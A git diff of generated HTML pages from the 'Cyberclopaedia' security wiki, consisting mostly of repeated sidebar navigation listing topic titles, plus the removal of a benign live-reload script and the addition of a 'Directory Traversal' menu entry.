        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -202,22 +202,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html b/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html index 701436e7..52d1ab42 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -188,22 +188,6 @@

Xmas Scan

- - diff --git a/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html b/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html index c2c9c833..ac38dd85 100644 --- a/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html +++ b/docs/Reconnaissance/Enumeration/Port Scanning/SYN Scan.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
